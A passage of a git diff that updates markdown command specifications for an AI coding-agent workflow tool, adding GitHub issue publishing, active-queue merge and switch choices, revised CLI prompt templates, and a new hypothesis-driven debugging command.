│ → { parallel_batches: [["S-1","S-2"], ["S-3"]] } │
|
||||
│ │
|
||||
│ 2. Dispatch batch 1 (parallel, SAME worktree): │
|
||||
│ ┌──────────────────────────────────────────────────────┐ │
|
||||
│ │ Shared Queue Worktree (or main) │ │
|
||||
│ │ ┌──────────────────┐ ┌──────────────────┐ │ │
|
||||
│ │ │ Executor 1 │ │ Executor 2 │ │ │
|
||||
│ │ │ detail S-1 │ │ detail S-2 │ │ │
|
||||
│ │ │ [T1→T2→T3] │ │ [T1→T2] │ │ │
|
||||
│ │ │ commit S-1 │ │ commit S-2 │ │ │
|
||||
│ │ │ done S-1 │ │ done S-2 │ │ │
|
||||
│ │ └──────────────────┘ └──────────────────┘ │ │
|
||||
│ └──────────────────────────────────────────────────────┘ │
|
||||
│ │
|
||||
│ 3. ccw issue queue dag (refresh) │
|
||||
│ → S-3 now ready → dispatch batch 2 (same worktree) │
|
||||
│ │
|
||||
│ 4. (if --worktree) ALL batches complete → cleanup worktree │
|
||||
│ → Prompt: Create PR / Merge to main / Keep branch │
|
||||
└─────────────────────────────────────────────────────────────────┘
|
||||
```
|
||||
|
||||
**Why this works for parallel:**
|
||||
- **ONE worktree for entire queue** → all solutions share same isolated workspace
|
||||
- `detail <id>` is READ-ONLY → no race conditions
|
||||
- Each executor handles **all tasks within a solution** sequentially
|
||||
- **One commit per solution** with formatted summary (not per-task)
|
||||
- `done <id>` updates only its own solution status
|
||||
- `queue dag` recalculates ready solutions after each batch
|
||||
- Solutions in same batch have NO file conflicts
|
||||
- Solutions in same batch have NO file conflicts (DAG guarantees)
|
||||
- **Main workspace stays clean** until merge/PR decision
|
||||
|
||||
## CLI Endpoint Contract
|
||||
|
||||
### `ccw issue queue dag`
|
||||
Returns dependency graph with parallel batches (solution-level):
|
||||
### `ccw issue queue list --brief --json`
|
||||
Returns queue index for selection (used when --queue not provided):
|
||||
```json
|
||||
{
|
||||
"active_queue_id": "QUE-20251215-001",
|
||||
"queues": [
|
||||
{ "id": "QUE-20251215-001", "status": "active", "issue_ids": ["ISS-001"], "total_solutions": 5, "completed_solutions": 2 }
|
||||
]
|
||||
}
|
||||
```
|
||||
|
||||
### `ccw issue queue dag --queue <queue-id>`
|
||||
Returns dependency graph with parallel batches (solution-level, **--queue required**):
|
||||
```json
|
||||
{
|
||||
"queue_id": "QUE-...",
|
||||
|
||||
@@ -29,6 +29,10 @@ interface Issue {
|
||||
source_url?: string;
|
||||
labels?: string[];
|
||||
|
||||
// GitHub binding (for non-GitHub sources that publish to GitHub)
|
||||
github_url?: string; // https://github.com/owner/repo/issues/123
|
||||
github_number?: number; // 123
|
||||
|
||||
// Optional structured fields
|
||||
expected_behavior?: string;
|
||||
actual_behavior?: string;
|
||||
@@ -165,7 +169,30 @@ if (clarityScore < 2 && (!issueData.context || issueData.context.length < 20)) {
|
||||
}
|
||||
```
|
||||
|
||||
### Phase 5: Create Issue
|
||||
### Phase 5: GitHub Publishing Decision (Non-GitHub Sources)
|
||||
|
||||
```javascript
|
||||
// For non-GitHub sources, ask if user wants to publish to GitHub
|
||||
let publishToGitHub = false;
|
||||
|
||||
if (issueData.source !== 'github') {
|
||||
const publishAnswer = AskUserQuestion({
|
||||
questions: [{
|
||||
question: 'Would you like to publish this issue to GitHub?',
|
||||
header: 'Publish',
|
||||
multiSelect: false,
|
||||
options: [
|
||||
{ label: 'Yes, publish to GitHub', description: 'Create issue on GitHub and link it' },
|
||||
{ label: 'No, keep local only', description: 'Store as local issue without GitHub sync' }
|
||||
]
|
||||
}]
|
||||
});
|
||||
|
||||
publishToGitHub = publishAnswer.answers?.['Publish']?.includes('Yes');
|
||||
}
|
||||
```
|
||||
|
||||
### Phase 6: Create Issue
|
||||
|
||||
**Summary Display:**
|
||||
- Show ID, title, source, affected files (if any)
|
||||
@@ -220,8 +247,64 @@ EOF
|
||||
}
|
||||
```
|
||||
|
||||
**GitHub Publishing** (if user opted in):
|
||||
```javascript
|
||||
// Step 1: Create local issue FIRST
|
||||
const localIssue = createLocalIssue(issueData); // ccw issue create
|
||||
|
||||
// Step 2: Publish to GitHub if requested
|
||||
if (publishToGitHub) {
|
||||
const ghResult = Bash(`gh issue create --title "${issueData.title}" --body "${issueData.context}"`);
|
||||
// Parse GitHub URL from output
|
||||
const ghUrl = ghResult.match(/https:\/\/github\.com\/[\w-]+\/[\w-]+\/issues\/\d+/)?.[0];
|
||||
const ghNumber = parseInt(ghUrl?.match(/\/issues\/(\d+)/)?.[1]);
|
||||
|
||||
if (ghNumber) {
|
||||
// Step 3: Update local issue with GitHub binding
|
||||
Bash(`ccw issue update ${localIssue.id} --github-url "${ghUrl}" --github-number ${ghNumber}`);
|
||||
// Or via pipe:
|
||||
// echo '{"github_url":"${ghUrl}","github_number":${ghNumber}}' | ccw issue update ${localIssue.id}
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
**Workflow:**
|
||||
```
|
||||
1. Create local issue (ISS-YYYYMMDD-NNN) → stored in .workflow/issues.jsonl
|
||||
2. If publishToGitHub:
|
||||
a. gh issue create → returns GitHub URL
|
||||
b. Update local issue with github_url + github_number binding
|
||||
3. Both local and GitHub issues exist, linked together
|
||||
```
|
||||
|
||||
**Example with GitHub Publishing:**
|
||||
```bash
|
||||
# User creates text issue
|
||||
/issue:new "Login fails with special chars. Expected: success. Actual: 500"
|
||||
|
||||
# System asks: "Would you like to publish this issue to GitHub?"
|
||||
# User selects: "Yes, publish to GitHub"
|
||||
|
||||
# Output:
|
||||
# ✓ Local issue created: ISS-20251229-001
|
||||
# ✓ Published to GitHub: https://github.com/org/repo/issues/123
|
||||
# ✓ GitHub binding saved to local issue
|
||||
# → Next step: /issue:plan ISS-20251229-001
|
||||
|
||||
# Resulting issue JSON:
|
||||
{
|
||||
"id": "ISS-20251229-001",
|
||||
"title": "Login fails with special chars",
|
||||
"source": "text",
|
||||
"github_url": "https://github.com/org/repo/issues/123",
|
||||
"github_number": 123,
|
||||
...
|
||||
}
|
||||
```
|
||||
|
||||
**Completion:**
|
||||
- Display created issue ID
|
||||
- Show GitHub URL (if published)
|
||||
- Show next step: `/issue:plan <id>`
|
||||
|
||||
## Execution Flow
|
||||
@@ -240,9 +323,16 @@ Phase 2: Data Extraction (branched by clarity)
|
||||
│ │ (3 files max) │ → feedback │
|
||||
└────────────┴─────────────────┴──────────────┘
|
||||
|
||||
Phase 3: Create Issue
|
||||
Phase 3: GitHub Publishing Decision (non-GitHub only)
|
||||
├─ Source = github: Skip (already from GitHub)
|
||||
└─ Source ≠ github: AskUserQuestion
|
||||
├─ Yes → publishToGitHub = true
|
||||
└─ No → publishToGitHub = false
|
||||
|
||||
Phase 4: Create Issue
|
||||
├─ Score ≥ 2: Direct creation
|
||||
└─ Score < 2: Confirm first → Create
|
||||
└─ If publishToGitHub: gh issue create → link URL
|
||||
|
||||
Note: Deep exploration & lifecycle deferred to /issue:plan
|
||||
```
|
||||
|
||||
@@ -131,7 +131,7 @@ TASK: • Analyze issue titles/tags semantically • Identify functional/archite
|
||||
MODE: analysis
|
||||
CONTEXT: Issue metadata only
|
||||
EXPECTED: JSON with groups array, each containing max 4 issue_ids, theme, rationale
|
||||
RULES: $(cat ~/.claude/workflows/cli-templates/protocols/analysis-protocol.md) | Each issue in exactly one group | Max 4 issues per group | Balance group sizes
|
||||
CONSTRAINTS: Each issue in exactly one group | Max 4 issues per group | Balance group sizes
|
||||
|
||||
INPUT:
|
||||
${JSON.stringify(issueSummaries, null, 2)}
|
||||
@@ -198,11 +198,12 @@ ${issueList}
|
||||
2. Load project context files
|
||||
3. Explore codebase (ACE semantic search)
|
||||
4. Plan solution with tasks (schema: solution-schema.json)
|
||||
5. Write solution to: .workflow/issues/solutions/{issue-id}.jsonl
|
||||
6. Single solution → auto-bind; Multiple → return for selection
|
||||
5. **If github_url exists**: Add final task to comment on GitHub issue
|
||||
6. Write solution to: .workflow/issues/solutions/{issue-id}.jsonl
|
||||
7. Single solution → auto-bind; Multiple → return for selection
|
||||
|
||||
### Rules
|
||||
- Solution ID format: SOL-{issue-id}-{seq}
|
||||
- Solution ID format: SOL-{issue-id}-{uid} (uid: 4 random alphanumeric chars, e.g., a7x9)
|
||||
- Single solution per issue → auto-bind via ccw issue bind
|
||||
- Multiple solutions → register only, return pending_selection
|
||||
- Tasks must have quantified acceptance.criteria
|
||||
|
||||
@@ -65,9 +65,13 @@ Queue formation command using **issue-queue-agent** that analyzes all bound solu
|
||||
--queues <n> Number of parallel queues (default: 1)
|
||||
--issue <id> Form queue for specific issue only
|
||||
--append <id> Append issue to active queue (don't create new)
|
||||
--force Skip active queue check, always create new queue
|
||||
|
||||
# CLI subcommands (ccw issue queue ...)
|
||||
ccw issue queue list List all queues with status
|
||||
ccw issue queue add <issue-id> Add issue to queue (interactive if active queue exists)
|
||||
ccw issue queue add <issue-id> -f Add to new queue without prompt (force)
|
||||
ccw issue queue merge <src> --queue <target> Merge source queue into target queue
|
||||
ccw issue queue switch <queue-id> Switch active queue
|
||||
ccw issue queue archive Archive current queue
|
||||
ccw issue queue delete <queue-id> Delete queue from history
|
||||
@@ -92,7 +96,7 @@ Phase 2-4: Agent-Driven Queue Formation (issue-queue-agent)
|
||||
│ ├─ Build dependency DAG from conflicts
|
||||
│ ├─ Calculate semantic priority per solution
|
||||
│ └─ Assign execution groups (parallel/sequential)
|
||||
└─ Each agent writes: queue JSON + index update
|
||||
└─ Each agent writes: queue JSON + index update (NOT active yet)
|
||||
|
||||
Phase 5: Conflict Clarification (if needed)
|
||||
├─ Collect `clarifications` arrays from all agents
|
||||
@@ -102,7 +106,24 @@ Phase 5: Conflict Clarification (if needed)
|
||||
|
||||
Phase 6: Status Update & Summary
|
||||
├─ Update issue statuses to 'queued'
|
||||
└─ Display queue summary (N queues), next step: /issue:execute
|
||||
└─ Display new queue summary (N queues)
|
||||
|
||||
Phase 7: Active Queue Check & Decision (REQUIRED)
|
||||
├─ Read queue index: ccw issue queue list --brief
|
||||
├─ Get generated queue ID from agent output
|
||||
├─ If NO active queue exists:
|
||||
│ ├─ Set generated queue as active_queue_id
|
||||
│ ├─ Update index.json
|
||||
│ └─ Display: "Queue created and activated"
|
||||
│
|
||||
└─ If active queue exists with items:
|
||||
├─ Display both queues to user
|
||||
├─ Use AskUserQuestion to prompt:
|
||||
│ ├─ "Use new queue (keep existing)" → Set new as active, keep old inactive
|
||||
│ ├─ "Merge: add new items to existing" → Merge new → existing, delete new
|
||||
│ ├─ "Merge: add existing items to new" → Merge existing → new, archive old
|
||||
│ └─ "Cancel" → Delete new queue, keep existing active
|
||||
└─ Execute chosen action
|
||||
```
|
||||
|
||||
## Implementation
|
||||
@@ -306,6 +327,41 @@ ccw issue update <issue-id> --status queued
|
||||
- Show unplanned issues (planned but NOT in queue)
|
||||
- Show next step: `/issue:execute`
|
||||
|
||||
### Phase 7: Active Queue Check & Decision
|
||||
|
||||
**After agent completes Phase 1-6, check for active queue:**
|
||||
|
||||
```bash
|
||||
ccw issue queue list --brief
|
||||
```
|
||||
|
||||
**Decision:**
|
||||
- If `active_queue_id` is null → `ccw issue queue switch <new-queue-id>` (activate new queue)
|
||||
- If active queue exists → Use **AskUserQuestion** to prompt user
|
||||
|
||||
**AskUserQuestion:**
|
||||
```javascript
|
||||
AskUserQuestion({
|
||||
questions: [{
|
||||
question: "Active queue exists. How would you like to proceed?",
|
||||
header: "Queue Action",
|
||||
options: [
|
||||
{ label: "Merge into existing queue", description: "Add new items to active queue, delete new queue" },
|
||||
{ label: "Use new queue", description: "Switch to new queue, keep existing in history" },
|
||||
{ label: "Cancel", description: "Delete new queue, keep existing active" }
|
||||
],
|
||||
multiSelect: false
|
||||
}]
|
||||
})
|
||||
```
|
||||
|
||||
**Action Commands:**
|
||||
|
||||
| User Choice | Commands |
|
||||
|-------------|----------|
|
||||
| **Merge into existing** | `ccw issue queue merge <new-queue-id> --queue <active-queue-id>` then `ccw issue queue delete <new-queue-id>` |
|
||||
| **Use new queue** | `ccw issue queue switch <new-queue-id>` |
|
||||
| **Cancel** | `ccw issue queue delete <new-queue-id>` |
|
||||
|
||||
## Storage Structure (Queue History)
|
||||
|
||||
@@ -360,6 +416,9 @@ ccw issue update <issue-id> --status queued
|
||||
| User cancels clarification | Abort queue formation |
|
||||
| **index.json not updated** | Auto-fix: Set active_queue_id to new queue |
|
||||
| **Queue file missing solutions** | Abort with error, agent must regenerate |
|
||||
| **User cancels queue add** | Display message, return without changes |
|
||||
| **Merge with empty source** | Skip merge, display warning |
|
||||
| **All items duplicate** | Skip merge, display "All items already exist" |
|
||||
|
||||
## Quality Checklist
|
||||
|
||||
|
||||
@@ -223,8 +223,8 @@ TASK:
|
||||
MODE: analysis
|
||||
CONTEXT: @src/**/*.controller.ts @src/**/*.routes.ts @src/**/*.dto.ts @src/**/middleware/**/*
|
||||
EXPECTED: JSON format API structure analysis report with modules, endpoints, security schemes, and error codes
|
||||
RULES: $(cat ~/.claude/workflows/cli-templates/protocols/analysis-protocol.md) | Strict RESTful standards | Identify all public endpoints | Document output language: {lang}
|
||||
" --tool gemini --mode analysis --cd {project_root}
|
||||
CONSTRAINTS: Strict RESTful standards | Identify all public endpoints | Document output language: {lang}
|
||||
" --tool gemini --mode analysis --rule analysis-code-patterns --cd {project_root}
|
||||
```
|
||||
|
||||
**Update swagger-planning-data.json** with analysis results:
|
||||
@@ -387,7 +387,7 @@ bash(cat ${session_dir}/.process/swagger-planning-data.json | jq -r '.api_struct
|
||||
"step": 1,
|
||||
"title": "Generate OpenAPI spec file",
|
||||
"description": "Create complete swagger.yaml specification file",
|
||||
"cli_prompt": "PURPOSE: Generate OpenAPI 3.0.3 specification file from analyzed API structure\nTASK:\n• Define openapi version: 3.0.3\n• Define info: title, description, version, contact, license\n• Define servers: development, staging, production environments\n• Define tags: organized by business modules\n• Define paths: all API endpoints with complete specifications\n• Define components: schemas, securitySchemes, parameters, responses\nMODE: write\nCONTEXT: @[api_analysis]\nEXPECTED: Complete swagger.yaml file following OpenAPI 3.0.3 specification\nRULES: $(cat ~/.claude/workflows/cli-templates/protocols/write-protocol.md) $(cat ~/.claude/workflows/cli-templates/prompts/documentation/swagger-api.txt) | Use {lang} for all descriptions | Strict RESTful standards",
|
||||
"cli_prompt": "PURPOSE: Generate OpenAPI 3.0.3 specification file from analyzed API structure\nTASK:\n• Define openapi version: 3.0.3\n• Define info: title, description, version, contact, license\n• Define servers: development, staging, production environments\n• Define tags: organized by business modules\n• Define paths: all API endpoints with complete specifications\n• Define components: schemas, securitySchemes, parameters, responses\nMODE: write\nCONTEXT: @[api_analysis]\nEXPECTED: Complete swagger.yaml file following OpenAPI 3.0.3 specification\nCONSTRAINTS: Use {lang} for all descriptions | Strict RESTful standards\n--rule documentation-swagger-api",
|
||||
"output": "swagger.yaml"
|
||||
}
|
||||
],
|
||||
@@ -429,7 +429,7 @@ bash(cat ${session_dir}/.process/swagger-planning-data.json | jq -r '.api_struct
|
||||
{
|
||||
"step": 1,
|
||||
"title": "Generate authentication documentation",
|
||||
"cli_prompt": "PURPOSE: Generate comprehensive authentication documentation for API security\nTASK:\n• Document authentication mechanism: JWT Bearer Token\n• Explain header format: Authorization: Bearer <token>\n• Describe token lifecycle: acquisition, refresh, expiration handling\n• Define permission levels: public, user, admin, super_admin\n• Document authentication failure responses: 401/403 error handling\nMODE: write\nCONTEXT: @[auth_patterns] @src/**/auth/**/* @src/**/guard/**/*\nEXPECTED: Complete authentication guide in {lang}\nRULES: $(cat ~/.claude/workflows/cli-templates/protocols/write-protocol.md) | Include code examples | Clear step-by-step instructions",
|
||||
"cli_prompt": "PURPOSE: Generate comprehensive authentication documentation for API security\nTASK:\n• Document authentication mechanism: JWT Bearer Token\n• Explain header format: Authorization: Bearer <token>\n• Describe token lifecycle: acquisition, refresh, expiration handling\n• Define permission levels: public, user, admin, super_admin\n• Document authentication failure responses: 401/403 error handling\nMODE: write\nCONTEXT: @[auth_patterns] @src/**/auth/**/* @src/**/guard/**/*\nEXPECTED: Complete authentication guide in {lang}\nCONSTRAINTS: Include code examples | Clear step-by-step instructions\n--rule development-feature",
|
||||
"output": "{auth_doc_name}"
|
||||
}
|
||||
],
|
||||
@@ -464,7 +464,7 @@ bash(cat ${session_dir}/.process/swagger-planning-data.json | jq -r '.api_struct
|
||||
{
|
||||
"step": 1,
|
||||
"title": "Generate error code specification document",
|
||||
"cli_prompt": "PURPOSE: Generate comprehensive error code specification for consistent API error handling\nTASK:\n• Define error response format: {code, message, details, timestamp}\n• Document authentication errors (AUTH_xxx): 401/403 series\n• Document parameter errors (PARAM_xxx): 400 series\n• Document business errors (BIZ_xxx): business logic errors\n• Document system errors (SYS_xxx): 500 series\n• For each error code: HTTP status, error message, possible causes, resolution suggestions\nMODE: write\nCONTEXT: @src/**/*.exception.ts @src/**/*.filter.ts\nEXPECTED: Complete error code specification in {lang} with tables and examples\nRULES: $(cat ~/.claude/workflows/cli-templates/protocols/write-protocol.md) | Include response examples | Clear categorization",
|
||||
"cli_prompt": "PURPOSE: Generate comprehensive error code specification for consistent API error handling\nTASK:\n• Define error response format: {code, message, details, timestamp}\n• Document authentication errors (AUTH_xxx): 401/403 series\n• Document parameter errors (PARAM_xxx): 400 series\n• Document business errors (BIZ_xxx): business logic errors\n• Document system errors (SYS_xxx): 500 series\n• For each error code: HTTP status, error message, possible causes, resolution suggestions\nMODE: write\nCONTEXT: @src/**/*.exception.ts @src/**/*.filter.ts\nEXPECTED: Complete error code specification in {lang} with tables and examples\nCONSTRAINTS: Include response examples | Clear categorization\n--rule development-feature",
|
||||
"output": "{error_doc_name}"
|
||||
}
|
||||
],
|
||||
@@ -523,7 +523,7 @@ bash(cat ${session_dir}/.process/swagger-planning-data.json | jq -r '.api_struct
|
||||
"step": 1,
|
||||
"title": "Generate module API documentation",
|
||||
"description": "Generate complete API documentation for ${module_name}",
|
||||
"cli_prompt": "PURPOSE: Generate complete RESTful API documentation for ${module_name} module\nTASK:\n• Create module overview: purpose, use cases, prerequisites\n• Generate endpoint index: grouped by functionality\n• For each endpoint document:\n - Functional description: purpose and business context\n - Request method: GET/POST/PUT/DELETE\n - URL path: complete API path\n - Request headers: Authorization and other required headers\n - Path parameters: {id} and other path variables\n - Query parameters: pagination, filters, etc.\n - Request body: JSON Schema format\n - Response body: success and error responses\n - Field description table: type, required, example, description\n• Add usage examples: cURL, JavaScript, Python\n• Add version info: v1.0.0, last updated date\nMODE: write\nCONTEXT: @[module_endpoints] @[source_code]\nEXPECTED: Complete module API documentation in {lang} with all endpoints fully documented\nRULES: $(cat ~/.claude/workflows/cli-templates/protocols/write-protocol.md) $(cat ~/.claude/workflows/cli-templates/prompts/documentation/swagger-api.txt) | RESTful standards | Include all response codes",
|
||||
"cli_prompt": "PURPOSE: Generate complete RESTful API documentation for ${module_name} module\nTASK:\n• Create module overview: purpose, use cases, prerequisites\n• Generate endpoint index: grouped by functionality\n• For each endpoint document:\n - Functional description: purpose and business context\n - Request method: GET/POST/PUT/DELETE\n - URL path: complete API path\n - Request headers: Authorization and other required headers\n - Path parameters: {id} and other path variables\n - Query parameters: pagination, filters, etc.\n - Request body: JSON Schema format\n - Response body: success and error responses\n - Field description table: type, required, example, description\n• Add usage examples: cURL, JavaScript, Python\n• Add version info: v1.0.0, last updated date\nMODE: write\nCONTEXT: @[module_endpoints] @[source_code]\nEXPECTED: Complete module API documentation in {lang} with all endpoints fully documented\nCONSTRAINTS: RESTful standards | Include all response codes\n--rule documentation-swagger-api",
|
||||
"output": "${module_doc_name}"
|
||||
}
|
||||
],
|
||||
@@ -559,7 +559,7 @@ bash(cat ${session_dir}/.process/swagger-planning-data.json | jq -r '.api_struct
|
||||
{
|
||||
"step": 1,
|
||||
"title": "Generate API overview",
|
||||
"cli_prompt": "PURPOSE: Generate API overview document with navigation and quick start guide\nTASK:\n• Create introduction: system features, tech stack, version\n• Write quick start guide: authentication, first request example\n• Build module navigation: categorized links to all modules\n• Document environment configuration: development, staging, production\n• List SDKs and tools: client libraries, Postman collection\nMODE: write\nCONTEXT: @[all_module_docs] @.workflow/docs/${project_name}/api/swagger.yaml\nEXPECTED: Complete API overview in {lang} with navigation links\nRULES: $(cat ~/.claude/workflows/cli-templates/protocols/write-protocol.md) | Clear structure | Quick start focus",
|
||||
"cli_prompt": "PURPOSE: Generate API overview document with navigation and quick start guide\nTASK:\n• Create introduction: system features, tech stack, version\n• Write quick start guide: authentication, first request example\n• Build module navigation: categorized links to all modules\n• Document environment configuration: development, staging, production\n• List SDKs and tools: client libraries, Postman collection\nMODE: write\nCONTEXT: @[all_module_docs] @.workflow/docs/${project_name}/api/swagger.yaml\nEXPECTED: Complete API overview in {lang} with navigation links\nCONSTRAINTS: Clear structure | Quick start focus\n--rule development-feature",
|
||||
"output": "README.md"
|
||||
}
|
||||
],
|
||||
@@ -602,7 +602,7 @@ bash(cat ${session_dir}/.process/swagger-planning-data.json | jq -r '.api_struct
|
||||
{
|
||||
"step": 1,
|
||||
"title": "Generate test report",
|
||||
"cli_prompt": "PURPOSE: Generate comprehensive API test validation report\nTASK:\n• Document test environment configuration\n• Calculate endpoint coverage statistics\n• Report test results: pass/fail counts\n• Document boundary tests: parameter limits, null values, special characters\n• Document exception tests: auth failures, permission denied, resource not found\n• List issues found with recommendations\nMODE: write\nCONTEXT: @[swagger_spec]\nEXPECTED: Complete test report in {lang} with detailed results\nRULES: $(cat ~/.claude/workflows/cli-templates/protocols/write-protocol.md) | Include test cases | Clear pass/fail status",
|
||||
"cli_prompt": "PURPOSE: Generate comprehensive API test validation report\nTASK:\n• Document test environment configuration\n• Calculate endpoint coverage statistics\n• Report test results: pass/fail counts\n• Document boundary tests: parameter limits, null values, special characters\n• Document exception tests: auth failures, permission denied, resource not found\n• List issues found with recommendations\nMODE: write\nCONTEXT: @[swagger_spec]\nEXPECTED: Complete test report in {lang} with detailed results\nCONSTRAINTS: Include test cases | Clear pass/fail status\n--rule development-tests",
|
||||
"output": "{test_doc_name}"
|
||||
}
|
||||
],
|
||||
|
||||
@@ -147,8 +147,8 @@ You are generating path-conditional rules for Claude Code.
|
||||
|
||||
## Instructions
|
||||
|
||||
Read the agent prompt template for detailed instructions:
|
||||
$(cat ~/.claude/workflows/cli-templates/prompts/rules/tech-rules-agent-prompt.txt)
|
||||
Read the agent prompt template for detailed instructions.
|
||||
Use --rule rules-tech-rules-agent-prompt to load the template automatically.
|
||||
|
||||
## Execution Steps
|
||||
|
||||
|
||||
@@ -424,6 +424,17 @@ CONTEXT_VARS:
|
||||
- **Agent execution failure**: Agent-specific retry with minimal dependencies
|
||||
- **Template loading issues**: Agent handles graceful degradation
|
||||
- **Synthesis conflicts**: Synthesis highlights disagreements without resolution
|
||||
- **Context overflow protection**: See below for automatic context management
|
||||
|
||||
## Context Overflow Protection
|
||||
|
||||
**Per-role limits**: See `conceptual-planning-agent.md` (< 3000 words main, < 2000 words sub-docs, max 5 sub-docs)
|
||||
|
||||
**Synthesis protection**: If total analysis > 100KB, synthesis reads only `analysis.md` files (not sub-documents)
|
||||
|
||||
**Recovery**: Check logs → reduce scope (--count 2) → use --summary-only → manual synthesis
|
||||
|
||||
**Prevention**: Start with --count 3, use structured topic format, review output sizes before synthesis
|
||||
|
||||
## Reference Information
|
||||
|
||||
|
||||
@@ -132,7 +132,7 @@ Scan and analyze workflow session directories:
|
||||
|
||||
**Staleness criteria**:
|
||||
- Active sessions: No modification >7 days + no related git commits
|
||||
- Archives: >30 days old + no feature references in project.json
|
||||
- Archives: >30 days old + no feature references in project-tech.json
|
||||
- Lite-plan: >7 days old + plan.json not executed
|
||||
- Debug: >3 days old + issue not in recent commits
|
||||
|
||||
@@ -443,8 +443,8 @@ if (selectedCategories.includes('Sessions')) {
|
||||
}
|
||||
}
|
||||
|
||||
// Update project.json if features referenced deleted sessions
|
||||
const projectPath = '.workflow/project.json'
|
||||
// Update project-tech.json if features referenced deleted sessions
|
||||
const projectPath = '.workflow/project-tech.json'
|
||||
if (fileExists(projectPath)) {
|
||||
const project = JSON.parse(Read(projectPath))
|
||||
const deletedPaths = new Set(results.deleted)
|
||||
|
||||
666
.claude/commands/workflow/debug-with-file.md
Normal file
666
.claude/commands/workflow/debug-with-file.md
Normal file
@@ -0,0 +1,666 @@
|
||||
---
|
||||
name: debug-with-file
|
||||
description: Interactive hypothesis-driven debugging with documented exploration, understanding evolution, and Gemini-assisted correction
|
||||
argument-hint: "\"bug description or error message\""
|
||||
allowed-tools: TodoWrite(*), Task(*), AskUserQuestion(*), Read(*), Grep(*), Glob(*), Bash(*), Edit(*), Write(*)
|
||||
---
|
||||
|
||||
# Workflow Debug-With-File Command (/workflow:debug-with-file)
|
||||
|
||||
## Overview
|
||||
|
||||
Enhanced evidence-based debugging with **documented exploration process**. Records understanding evolution, consolidates insights, and uses Gemini to correct misunderstandings.
|
||||
|
||||
**Core workflow**: Explore → Document → Log → Analyze → Correct Understanding → Fix → Verify
|
||||
|
||||
**Key enhancements over /workflow:debug**:
|
||||
- **understanding.md**: Timeline of exploration and learning
|
||||
- **Gemini-assisted correction**: Validates and corrects hypotheses
|
||||
- **Consolidation**: Simplifies proven-wrong understanding to avoid clutter
|
||||
- **Learning retention**: Preserves what was learned, even from failed attempts
|
||||
|
||||
## Usage
|
||||
|
||||
```bash
|
||||
/workflow:debug-with-file <BUG_DESCRIPTION>
|
||||
|
||||
# Arguments
|
||||
<bug-description> Bug description, error message, or stack trace (required)
|
||||
```
|
||||
|
||||
## Execution Process
|
||||
|
||||
```
|
||||
Session Detection:
|
||||
├─ Check if debug session exists for this bug
|
||||
├─ EXISTS + understanding.md exists → Continue mode
|
||||
└─ NOT_FOUND → Explore mode
|
||||
|
||||
Explore Mode:
|
||||
├─ Locate error source in codebase
|
||||
├─ Document initial understanding in understanding.md
|
||||
├─ Generate testable hypotheses with Gemini validation
|
||||
├─ Add NDJSON logging instrumentation
|
||||
└─ Output: Hypothesis list + await user reproduction
|
||||
|
||||
Analyze Mode:
|
||||
├─ Parse debug.log, validate each hypothesis
|
||||
├─ Use Gemini to analyze evidence and correct understanding
|
||||
├─ Update understanding.md with:
|
||||
│ ├─ New evidence
|
||||
│ ├─ Corrected misunderstandings (strikethrough + correction)
|
||||
│ └─ Consolidated current understanding
|
||||
└─ Decision:
|
||||
├─ Confirmed → Fix root cause
|
||||
├─ Inconclusive → Add more logging, iterate
|
||||
└─ All rejected → Gemini-assisted new hypotheses
|
||||
|
||||
Fix & Cleanup:
|
||||
├─ Apply fix based on confirmed hypothesis
|
||||
├─ User verifies
|
||||
├─ Document final understanding + lessons learned
|
||||
├─ Remove debug instrumentation
|
||||
└─ If not fixed → Return to Analyze mode
|
||||
```
|
||||
|
||||
## Implementation
|
||||
|
||||
### Session Setup & Mode Detection
|
||||
|
||||
```javascript
|
||||
const getUtc8ISOString = () => new Date(Date.now() + 8 * 60 * 60 * 1000).toISOString()
|
||||
|
||||
const bugSlug = bug_description.toLowerCase().replace(/[^a-z0-9]+/g, '-').substring(0, 30)
|
||||
const dateStr = getUtc8ISOString().substring(0, 10)
|
||||
|
||||
const sessionId = `DBG-${bugSlug}-${dateStr}`
|
||||
const sessionFolder = `.workflow/.debug/${sessionId}`
|
||||
const debugLogPath = `${sessionFolder}/debug.log`
|
||||
const understandingPath = `${sessionFolder}/understanding.md`
|
||||
const hypothesesPath = `${sessionFolder}/hypotheses.json`
|
||||
|
||||
// Auto-detect mode
|
||||
const sessionExists = fs.existsSync(sessionFolder)
|
||||
const hasUnderstanding = sessionExists && fs.existsSync(understandingPath)
|
||||
const logHasContent = sessionExists && fs.existsSync(debugLogPath) && fs.statSync(debugLogPath).size > 0
|
||||
|
||||
const mode = logHasContent ? 'analyze' : (hasUnderstanding ? 'continue' : 'explore')
|
||||
|
||||
if (!sessionExists) {
|
||||
bash(`mkdir -p ${sessionFolder}`)
|
||||
}
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
### Explore Mode
|
||||
|
||||
**Step 1.1: Locate Error Source**
|
||||
|
||||
```javascript
|
||||
// Extract keywords from bug description
|
||||
const keywords = extractErrorKeywords(bug_description)
|
||||
|
||||
// Search codebase for error locations
|
||||
const searchResults = []
|
||||
for (const keyword of keywords) {
|
||||
const results = Grep({ pattern: keyword, path: ".", output_mode: "content", "-C": 3 })
|
||||
searchResults.push({ keyword, results })
|
||||
}
|
||||
|
||||
// Identify affected files and functions
|
||||
const affectedLocations = analyzeSearchResults(searchResults)
|
||||
```
|
||||
|
||||
**Step 1.2: Document Initial Understanding**
|
||||
|
||||
Create `understanding.md` with exploration timeline:
|
||||
|
||||
```markdown
|
||||
# Understanding Document
|
||||
|
||||
**Session ID**: ${sessionId}
|
||||
**Bug Description**: ${bug_description}
|
||||
**Started**: ${getUtc8ISOString()}
|
||||
|
||||
---
|
||||
|
||||
## Exploration Timeline
|
||||
|
||||
### Iteration 1 - Initial Exploration (${timestamp})
|
||||
|
||||
#### Current Understanding
|
||||
|
||||
Based on bug description and initial code search:
|
||||
|
||||
- Error pattern: ${errorPattern}
|
||||
- Affected areas: ${affectedLocations.map(l => l.file).join(', ')}
|
||||
- Initial hypothesis: ${initialThoughts}
|
||||
|
||||
#### Evidence from Code Search
|
||||
|
||||
${searchResults.map(r => `
|
||||
**Keyword: "${r.keyword}"**
|
||||
- Found in: ${r.results.files.join(', ')}
|
||||
- Key findings: ${r.insights}
|
||||
`).join('\n')}
|
||||
|
||||
#### Next Steps
|
||||
|
||||
- Generate testable hypotheses
|
||||
- Add instrumentation
|
||||
- Await reproduction
|
||||
|
||||
---
|
||||
|
||||
## Current Consolidated Understanding
|
||||
|
||||
${initialConsolidatedUnderstanding}
|
||||
```
|
||||
|
||||
